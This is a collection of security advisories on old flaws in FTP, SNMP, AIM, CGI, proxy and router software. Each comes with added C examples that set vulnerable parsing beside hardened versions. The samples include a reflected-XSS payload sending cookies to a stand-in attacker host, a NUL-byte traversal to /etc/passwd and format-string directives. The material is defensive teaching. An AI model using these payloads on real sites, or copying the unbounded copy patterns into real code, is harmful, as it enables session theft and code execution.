BrowseFTP is an FTP client that runs on various Microsoft Windows operating systems. An issue has been reported that could allow a malicious FTP server to execute arbitrary code on the host of a BrowseFTP user. The condition is triggered when a BrowseFTP user connects to an FTP host whose '220' greeting response is of excessive length. The resulting stack-based overflow can allow the operator of a malicious server to execute arbitrary code on (and gain control of) client hosts. It is also possible to crash the client.
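The following is an added example and not BrowseFTP's code: a bounded reader for an FTP reply line, shown next to the unbounded copy pattern that produces a stack-based overflow when a server sends an oversized 220 greeting. The 512-byte limit, the helper names and the sample banners are assumptions constructed for the demo.

```c
/* Added example (not BrowseFTP's code): bounded parsing of an FTP reply
 * line versus the unbounded strcpy pattern. Inputs are constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BANNER_MAX 512   /* assumed client-side limit; RFC 959 sets no hard cap */

/* Vulnerable pattern: copies the whole server line into a fixed-size
 * stack buffer with no length check. A 220 line longer than the buffer
 * overwrites adjacent stack data, including the saved return address.
 * Only ever called below with a short, benign banner. */
static int parse_greeting_vulnerable(const char *line)
{
    char banner[BANNER_MAX];
    strcpy(banner, line);               /* overflow if strlen(line) >= BANNER_MAX */
    return atoi(banner);
}

/* Hardened: validates the 3-digit code, enforces a maximum line length
 * before any copy, and copies with explicit bounds into the caller's
 * buffer. Returns the reply code, or -1 on rejection. */
static int parse_greeting(const char *data, size_t len, char *out, size_t outsz)
{
    const char *eol = memchr(data, '\n', len);
    size_t linelen = eol ? (size_t)(eol - data) : len;

    if (linelen && data[linelen - 1] == '\r')   /* strip trailing CR */
        linelen--;

    /* A reply line starts with three digits, then ' ' (final) or '-' (continuation). */
    if (linelen < 4)
        return -1;
    for (int i = 0; i < 3; i++)
        if (data[i] < '0' || data[i] > '9')
            return -1;
    if (data[3] != ' ' && data[3] != '-')
        return -1;

    if (linelen >= BANNER_MAX || linelen >= outsz)   /* length check before copy */
        return -1;

    memcpy(out, data, linelen);
    out[linelen] = '\0';
    return (data[0] - '0') * 100 + (data[1] - '0') * 10 + (data[2] - '0');
}

/* Constructed benign greeting. */
static const char GOOD_BANNER[] = "220 ftp.example.test FTP server ready\r\n";

/* Builds a greeting of `total` bytes (at least 4) like a malicious server
 * would send: "220 " followed by filler. Caller frees. */
static char *make_oversized_banner(size_t total)
{
    char *b = malloc(total + 3);
    if (!b) return NULL;
    memcpy(b, "220 ", 4);
    memset(b + 4, 'A', total - 4);
    memcpy(b + total, "\r\n", 3);
    return b;
}

/* Convenience wrappers so results can be checked as return values. */
static int greeting_code(const char *line)
{
    char out[BANNER_MAX];
    return parse_greeting(line, strlen(line), out, sizeof out);
}

static int oversized_banner_code(size_t total)
{
    char *b = make_oversized_banner(total);
    if (!b) return -2;
    int code = greeting_code(b);
    free(b);
    return code;
}

int main(void)
{
    printf("vulnerable parser on short banner: %d\n", parse_greeting_vulnerable(GOOD_BANNER));
    printf("hardened parser on short banner:   %d\n", greeting_code(GOOD_BANNER));
    printf("hardened parser on 4096-byte banner: %d (rejected)\n", oversized_banner_code(4096));
    return 0;
}
```

The hardened parser refuses the line before touching any buffer, which is the property a client needs: the length decision must not depend on first copying the data.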
A heap overflow vulnerability exists in the snmpnetstat client. When a list of interfaces is requested, an SNMP host may return malicious information which, under some circumstances, results in a heap overflow in the client. Exploitation of this vulnerability can result in the execution of arbitrary code with the privileges of the user running snmpnetstat.
BSCW (Basic Support for Cooperative Work) is a web-based groupware application, allowing users to share a workspace via a web interface. It runs on Microsoft Windows NT/2000 systems, as well as a number of Unix variants. The default installation allows users to self-register, potentially allowing untrusted users to access the service. This may provide a window of opportunity for an untrusted, malicious user to access the service to exploit known issues. One example of an existing issue that may be exploited as a result of untrusted users being able to self-register is BugTraq ID 3776 'BSCW Remote Command Execution Vulnerability'.
A vulnerability exists in the way that AIM parses a game request carrying a TLV (type, length, value) record of type 0x2711. This type of game request is prone to a buffer overflow which could allow a remote attacker to obtain the same privileges as the user who is currently logged on.
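As an added example (not AIM's code), the following parses a stream of TLV records whose length field is attacker-controlled. The vulnerable handler trusts the length; the hardened walk checks it against both the remaining buffer and the destination field. Type 0x2711 is the value named above; the 16-bit big-endian layout, the 32-byte field size and the sample packets are assumptions constructed for the demo.

```c
/* Added example, not AIM's code: TLV parsing with and without length
 * validation. Layout (16-bit type, 16-bit length, big-endian) and the
 * 32-byte game field are assumed; packets are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TLV_GAME_REQUEST 0x2711
#define GAME_FIELD_MAX   32

/* Vulnerable: copies `len` bytes into a fixed stack buffer. A record
 * claiming len > GAME_FIELD_MAX overwrites adjacent stack data. Only
 * called below with a small, benign length. */
static void handle_game_request_vulnerable(const uint8_t *value, uint16_t len)
{
    uint8_t field[GAME_FIELD_MAX];
    memcpy(field, value, len);
    (void)field;
}

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Hardened walk over a TLV buffer. Returns the number of well-formed
 * records, or -1 at the first malformed one. The last game-request
 * payload is copied into `game`, bounded by GAME_FIELD_MAX. */
static int parse_tlvs(const uint8_t *buf, size_t buflen, uint8_t *game, size_t *game_len)
{
    size_t off = 0;
    int count = 0;
    *game_len = 0;

    while (off < buflen) {
        if (buflen - off < 4)                 /* truncated header */
            return -1;
        uint16_t type = rd16(buf + off);
        uint16_t len  = rd16(buf + off + 2);
        off += 4;
        if (len > buflen - off)               /* length runs past the buffer */
            return -1;
        if (type == TLV_GAME_REQUEST) {
            if (len > GAME_FIELD_MAX)         /* length exceeds destination */
                return -1;
            memcpy(game, buf + off, len);
            *game_len = len;
        }
        off += len;
        count++;
    }
    return count;
}

/* Constructed packets. */
static const uint8_t BENIGN[] = {
    0x00, 0x01, 0x00, 0x02, 'h', 'i',           /* type 1, len 2 */
    0x27, 0x11, 0x00, 0x04, 'g', 'a', 'm', 'e'  /* game request, len 4 */
};
static const uint8_t OVERLONG[] = {
    0x27, 0x11, 0x01, 0x00,                     /* game request claiming len 256 */
    'A', 'A', 'A', 'A'                          /* but only 4 bytes follow */
};

static int demo(const uint8_t *pkt, size_t n)
{
    uint8_t game[GAME_FIELD_MAX];
    size_t glen;
    int r = parse_tlvs(pkt, n, game, &glen);
    printf("records=%d game_len=%zu\n", r, glen);
    return r;
}

/* A game request whose length fits the packet but not the field. */
static int demo_big_field(void)
{
    uint8_t pkt[4 + 64];
    pkt[0] = 0x27; pkt[1] = 0x11; pkt[2] = 0x00; pkt[3] = 64;
    memset(pkt + 4, 'B', 64);
    return demo(pkt, sizeof pkt);               /* -1: 64 > GAME_FIELD_MAX */
}

int main(void)
{
    demo(BENIGN, sizeof BENIGN);                /* 2 records, game_len 4 */
    demo(OVERLONG, sizeof OVERLONG);            /* -1: length exceeds buffer */
    demo_big_field();                           /* -1: length exceeds field */
    handle_game_request_vulnerable(BENIGN + 10, 4);  /* safe only because len is small */
    return 0;
}
```

Two separate checks are needed: a length larger than the remaining buffer is an out-of-bounds read, and a length larger than the destination is the overflow described above; passing the first check says nothing about the second.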
A vulnerability exists in Microsoft Internet Explorer that may allow a remote attacker to view known files on a target system when a user views web content containing a specially crafted script. The problem occurs when the 'GetObject()' JScript function is used with the ActiveX object 'htmlfile'. If a URL containing "../" sequences is passed as the first argument to the function, it is possible to cause Internet Explorer to grant the attacker's script full access to the DOM of the created HTML document object, from which the contents of the referenced local file can be read.
zml.cgi is a Perl script which can be used to support server-side include directives under Apache. It accepts as a parameter the file to parse for these SSI directives. This parameter is susceptible to the standard '../' directory traversal attack, allowing arbitrary files to be specified. Although the script attempts to append a .zml extension to any file accessed, appending a null byte to the file name parameter is sufficient to evade this restriction: the underlying open() call treats the null byte as the end of the string, so the appended extension is never seen.
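The following added example (not zml.cgi itself) shows why appending ".zml" does not protect the open() call. Perl strings carry an explicit length, but the C runtime that finally opens the file stops at the first NUL byte, so "../../etc/passwd\0" plus ".zml" is opened as "../../etc/passwd". The hardened builder rejects embedded NULs, absolute paths and ".." components before the extension is appended. The function names and sample parameters are assumptions constructed for the demo.

```c
/* Added example, not zml.cgi's code: the NUL-byte truncation behind the
 * extension bypass, beside a path builder that rejects it. */
#include <stdio.h>
#include <string.h>

#define PATH_MAX_DEMO 256

/* Naive: concatenates the length-counted parameter and ".zml" the way the
 * CGI did. Returns the length the C runtime actually sees (strlen), which
 * is shorter than the logical length whenever a NUL is embedded. */
static size_t naive_zml_path(const char *param, size_t plen, char *out, size_t outsz)
{
    if (plen + 4 >= outsz) return 0;
    memcpy(out, param, plen);
    memcpy(out + plen, ".zml", 5);    /* logical result: param + ".zml" */
    return strlen(out);               /* what open() will use */
}

/* Hardened: reject NUL bytes, absolute paths and any "." or ".."
 * component, then append the extension. Returns 1 on success, 0 on rejection. */
static int safe_zml_path(const char *param, size_t plen, char *out, size_t outsz)
{
    if (plen == 0 || plen + 4 >= outsz) return 0;
    if (memchr(param, '\0', plen)) return 0;           /* embedded NUL */
    if (param[0] == '/') return 0;                      /* absolute path */

    size_t start = 0;
    for (size_t i = 0; i <= plen; i++) {
        if (i == plen || param[i] == '/') {
            size_t clen = i - start;
            if (clen == 0 && i != plen) return 0;       /* empty component "//" */
            if (clen == 1 && param[start] == '.') return 0;
            if (clen == 2 && param[start] == '.' && param[start + 1] == '.') return 0;
            start = i + 1;
        }
    }
    memcpy(out, param, plen);
    memcpy(out + plen, ".zml", 5);
    return 1;
}

/* Constructed attack parameter: traversal followed by an explicit NUL.
 * sizeof counts both the embedded NUL and the terminating one. */
static const char EVIL_PARAM[] = "../../etc/passwd\0";
#define EVIL_LEN (sizeof EVIL_PARAM - 1)   /* 17 bytes, including the embedded NUL */

int main(void)
{
    char out[PATH_MAX_DEMO];

    size_t seen = naive_zml_path(EVIL_PARAM, EVIL_LEN, out, sizeof out);
    printf("naive: logical %zu bytes, open() sees %zu: \"%s\"\n",
           (size_t)EVIL_LEN + 4, seen, out);

    printf("safe(evil) accepted: %d\n", safe_zml_path(EVIL_PARAM, EVIL_LEN, out, sizeof out));
    if (safe_zml_path("docs/index", strlen("docs/index"), out, sizeof out))
        printf("safe(ok): %s\n", out);
    return 0;
}
```

The same truncation applies to any language whose strings may contain NUL but which hands the bytes to a C-style system call, so the check for embedded NULs belongs in the application, not in the extension-appending logic.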
DeleGate is prone to cross-site scripting attacks. HTML tags are not filtered from the request data that DeleGate echoes back in links on its error pages. As a result, an attacker can insert malicious script code into a link to a site running DeleGate. When a web user follows the link, an error page is displayed and the script executes in the user's browser in the context of the site running DeleGate. Such an attack may be used to steal a legitimate user's cookie-based authentication credentials.
When a protocol negotiation is initiated between a client and the server, it is possible to supply a string to the Stunnel server that is later used as a format string. A crafted string may result in the execution of arbitrary code with the privileges of the Stunnel process.
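As an added example (not Stunnel's code), the following shows a logging routine that receives peer-supplied text as its format argument, next to the safe form that passes the text as a "%s" argument, plus a small detector for conversion directives in untrusted input. The sample message is constructed and uses only "%%" so the demo has no undefined behaviour; a real attacker would use %x or %s to read the stack and %n to write memory. Names are assumptions.

```c
/* Added example, not Stunnel's code: format string reaching vsnprintf
 * from the peer, versus passing it as data. Sample message is constructed. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOG_MAX 256

/* Vulnerable: variadic logger whose format comes straight from the peer. */
static void log_vulnerable(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outsz, fmt, ap);     /* fmt is attacker-controlled */
    va_end(ap);
}

/* Safe: the peer text is data, the format is a literal. */
static void log_safe(char *out, size_t outsz, const char *msg)
{
    snprintf(out, outsz, "%s", msg);
}

/* Detection helper: counts '%' introducers that are not the "%%" escape.
 * Any non-zero result in protocol data destined for a log is suspicious. */
static int count_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        n++;
    }
    return n;
}

/* Constructed peer message: only "%%" so the vulnerable path stays defined. */
static const char PEER_MSG[] = "220 hello %%x %%x %%n";

int main(void)
{
    char buf[LOG_MAX];
    log_vulnerable(buf, sizeof buf, PEER_MSG);
    printf("vulnerable: %s\n", buf);     /* "%%" collapsed: directives were interpreted */
    log_safe(buf, sizeof buf, PEER_MSG);
    printf("safe:       %s\n", buf);     /* text logged verbatim */
    printf("directives in \"%%x %%x %%n\": %d\n", count_directives("%x %x %n"));
    return 0;
}
```

The difference in the two log lines is the whole bug: whatever the peer sent was parsed as a format, so with real directives it reads and writes memory rather than merely collapsing "%%".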
Aktivate is prone to cross-site scripting attacks. It is possible to construct a link to a website running Aktivate that contains arbitrary script code. When a user follows the link, the script executes in the user's browser in the context of the site hosting the affected software. The impact is that an attacker can hijack a legitimate web user's session by stealing cookie-based authentication credentials. Other cross-site scripting attacks are also possible.
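The following added example serves both reflected cross-site scripting issues above (the DeleGate error pages and Aktivate) and is not code from either project: an HTML-escaping routine applied to request data before it is echoed into a page, next to the unescaped echo that lets a link carry script into the response. The page template, the function names and the hostile URL are assumptions constructed for the demo.

```c
/* Added example for the DeleGate and Aktivate XSS issues, not code from
 * either project: escape echoed request data. Inputs are constructed. */
#include <stdio.h>
#include <string.h>

/* Escape the five characters that can break out of text or attribute
 * context. Returns bytes written (excluding NUL), or -1 if out is too small. */
static int html_escape(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (const char *p = in; *p; p++) {
        const char *rep;
        char one[2] = { *p, 0 };
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (o + rl >= outsz) return -1;
        memcpy(out + o, rep, rl);
        o += rl;
    }
    out[o] = '\0';
    return (int)o;
}

/* Vulnerable: builds the error page by echoing the requested URL as-is. */
static int error_page_vulnerable(const char *url, char *out, size_t outsz)
{
    return snprintf(out, outsz, "<p>Cannot fetch %s</p>", url);
}

/* Fixed: escape before echoing. Returns -1 if the URL does not fit. */
static int error_page_safe(const char *url, char *out, size_t outsz)
{
    char esc[1024];
    if (html_escape(url, esc, sizeof esc) < 0) return -1;
    return snprintf(out, outsz, "<p>Cannot fetch %s</p>", esc);
}

/* Constructed hostile link payload of the cookie-stealing kind. */
static const char EVIL_URL[] =
    "http://x/<script>document.location='http://attacker.test/?c='+document.cookie</script>";

int main(void)
{
    char page[2048];
    error_page_vulnerable(EVIL_URL, page, sizeof page);
    printf("vulnerable: %s\n", page);
    error_page_safe(EVIL_URL, page, sizeof page);
    printf("safe:       %s\n", page);
    return 0;
}
```

Escaping at the point of output is what both products lacked; filtering specific tags on input is brittle, whereas encoding every echoed byte makes the browser treat the link text as data regardless of what it contains.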
Prestige is a product line of DSL routers produced and distributed by Zyxel. When a Zyxel Prestige router receives fragmented packets whose reassembled length is greater than 64 kilobytes, the router crashes and must be power cycled to resume normal operation. A remote attacker can thereby deny service to legitimate users of the router. The router is affected only by fragmented packets received through the DSL interface; fragmented packets sent through the LAN interface have no effect on the system.
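As an added example (not Zyxel firmware), the following implements the check an IPv4 reassembler must apply to every fragment. The IPv4 total-length field is 16 bits, so a reassembled datagram can never legitimately exceed 65535 bytes; a fragment whose offset plus payload runs past that limit is exactly the shape described above and must be dropped before it is buffered. The structure names, the simulated queue and the fragment values are assumptions constructed for the demo.

```c
/* Added example, not Zyxel's code: per-fragment bound check for IPv4
 * reassembly, with a minimal simulated queue. Fragments are constructed. */
#include <stdint.h>
#include <stdio.h>

#define IP_MAX_DATAGRAM 65535u   /* 16-bit total-length field */
#define IP_HDR_LEN      20u      /* minimal header, assumed for the demo */

/* Fragment offset is carried in 8-byte units (13 bits, max 8191). */
struct frag {
    uint16_t offset_units;   /* IP header fragment-offset field */
    uint16_t payload_len;    /* bytes of data in this fragment */
    int      more_fragments; /* MF flag */
};

/* Returns 1 if the fragment can be accepted, 0 if it would push the
 * reassembled datagram beyond the IPv4 maximum. 32-bit arithmetic keeps
 * the addition itself from wrapping. */
static int fragment_fits(const struct frag *f)
{
    if (f->offset_units > 8191) return 0;
    uint32_t end = (uint32_t)f->offset_units * 8u + f->payload_len;
    return end + IP_HDR_LEN <= IP_MAX_DATAGRAM;
}

/* Simulated reassembly state for one datagram: tracks the highest data
 * byte seen and whether the last fragment (MF=0) has arrived. */
struct reasm { uint32_t high; int complete; };

/* Returns the reassembled data size once the final fragment is in,
 * 0 while still waiting, or -1 if the fragment was dropped. */
static int reasm_add(struct reasm *r, const struct frag *f)
{
    if (!fragment_fits(f)) return -1;
    uint32_t end = (uint32_t)f->offset_units * 8u + f->payload_len;
    if (end > r->high) r->high = end;
    if (!f->more_fragments) r->complete = 1;
    return r->complete ? (int)r->high : 0;
}

int main(void)
{
    /* Constructed: a 3000-byte payload split at a 1500-byte MTU. */
    struct frag normal[] = { { 0, 1480, 1 }, { 185, 1480, 1 }, { 370, 40, 0 } };
    /* Constructed: final fragment at offset 65528 with 100 bytes of data. */
    struct frag oversized = { 8191, 100, 0 };

    struct reasm r = { 0, 0 };
    int res = 0;
    for (size_t i = 0; i < 3; i++)
        res = reasm_add(&r, &normal[i]);
    printf("normal datagram reassembled to %d bytes\n", res);
    printf("oversized fragment accepted? %d\n", fragment_fits(&oversized));
    return 0;
}
```

Because the check uses only the offset and length fields of the fragment in hand, it needs no state about fragments already received and can run before any buffer is allocated, which is where a reassembler that crashes on oversized datagrams has gone wrong.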